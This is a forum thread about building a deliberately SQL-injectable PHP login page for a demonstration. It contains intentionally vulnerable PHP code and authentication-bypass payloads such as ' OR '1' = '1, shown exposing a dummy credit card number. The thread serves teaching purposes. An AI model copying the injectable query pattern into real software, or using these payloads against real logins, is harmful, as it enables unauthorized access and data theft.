Make a script vulnerable to SQL injection?

[shibbythestoner]

Hello.

I find myself in need of a way to show how some things can go wrong with php, databases, and the web. I decided there are few better ways than to demonstrate an SQL injection.
My problem is, however, that the injections don't appear to be working.
I've made sure that the variables passed through are pure input (employed stripslashes(), didn't use mysql_real_escape_string(), and so on). I've made various different attempts at injection, but so far the best result I get is an error about the following line:

Code:

if (mysql_num_rows($execute) == NULL){

Code:

mysql_num_rows(): supplied argument is not a valid MySQL result resource

Which is the error appearing on attempted injections.
Here is some of the code I have been using:

Code:

                                if (!$db){
                                    
                                    die("<font color='#F62817'><b>Error: Could not connect to database - ".mysql_error()."</b></font><p>\n");
                                    include("admin_loginform.php");
                                    mysql_close($db);
                                    
                                } //end of if
                                else {
                                    
                                    //Leaving $admin and $password open to SQL injection for demonstration purposes
                                    
                                    $query="SELECT *
                                        FROM admins
                                        WHERE username='$admin' AND password='$password'";
                                    $execute=mysql_query($query,$db);
                                    if (mysql_num_rows($execute) == NULL){
                                        
                                        echo "<font color='#F62817'><b>Error: Invalid username or password.</b></font><p>\n";
                                        include("admin_loginform.php");
                                        mysql_close($db);
                                        
                                    } //end of if
                                    else {
                                        
                                        echo "<font color='#5EFB6E'><b>Welcome to administration, $admin.</font></b><br>\n";
                                        echo "What do you want to do?<br>\n";

Can anyone tell me what I could do to make my script vulnerable? For once I want my script to be exploited and I find it doesn't work anyway! I've Googled a bit but I've either not looked in the right places or (oddly enough) there's not much material on how to MAKE a website more vulnerable.

Summary: I need my script to be exploitable via SQL injection. Any ideas please?

[Jordan]

Everything looks good and vulnerable here. How are you calling your script? You should call it as:

http://domain/script.php?admin=OR 1&password=anything

The OR 1 will cause a clause in the execution of your SQL Query that always equals true.

Also, I'm not entirely sure that the above statement will actually return any rows. This would cause the mysql_num_rows not to return anything.

You could try doing:


http://domain/script.php?admin=admin&password=OR 1

Which would cause the SQL to return the row with the username of admin.

Sidewinder should be able to help more once he sees this. He is fairly good with security and PHP.

[shibbythestoner]

So you suggest the use of the GET method, as opposed to POST? I'll try that out...perhaps that's what I've been doing wrong all along. You may well be correct about mysql_num_rows() returning nothing; since that's where some problems appear to originate from.
Well thanks very much, I'll try that out.

Edit: I'm afraid those suggestions didn't work, the input seems to go through fine but I still get the invalid username/password error. Anything else I could try?

[shibbythestoner]

Thanks to the "Similar Threads" feature I happened upon, I found the answer in v0id's post on Sidewinder's thread,
PHP: SQL Injections
Trying this:

Code:

' OR '1' = '1

works fine on my script. Thanks, guys!

[John]

It's really all about how crappy you write your code, when I wrote a my tutorial on SQL injections [PHP: SQL Injections], I couldn't for the life of me get a functional demo to work. However, you inspired me to give it another shot, and I managed to get it to work. I'm not really in the mood for explaining [tutorial does most of it] it so I'll just post my code and you can figure it out yourself.

Database: injectiontest
[highlight="SQL"]CREATE TABLE `users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(200) NOT NULL,
`password` varchar(200) NOT NULL,
`creditcard` varchar(200) NOT NULL,
PRIMARY KEY (`id`)
);

INSERT INTO `users` (`id`, `username`, `password`, `creditcard`) VALUES
(1, 'Sidewinder', 'monkey', '0123456789987654');[/highlight]

File: login.php

Code:

<?php

if(get_magic_quotes_gpc()) {
   $username = stripslashes($_GET['username']);
   $password = stripslashes($_GET['password']);
}

$link = @mysql_connect('localhost', '', '') 
    or die('Could not connect: ' . mysql_error());

mysql_select_db('injectiontest', $link) 
    or die('Could not select database.');


$query = mysql_query("SELECT * FROM `users` "
        . "WHERE `username` = '$username' "
        . "AND `password` = '$password'");
$row = mysql_fetch_assoc($query);

if(mysql_num_rows($query) == 1) {
    echo "Hello {$row['username']}!<br />";
    echo "Your creditcard number is: {$row['creditcard']}";
}

?>

Then if you point your browser to:

login.php?username=anything&password=anything'%20O R%201='1

You will see:

Hello Sidewinder!
Your creditcard number is: 0123456789987654

[shibbythestoner]

Cool script Sidewinder!
Also, thanks for your credit card number.

[Jordan]

Nice work Sidewinder!

[John]

It feels weird being complemented for providing a script with poor standards, horrible security measures, and completely senseless code - but thanks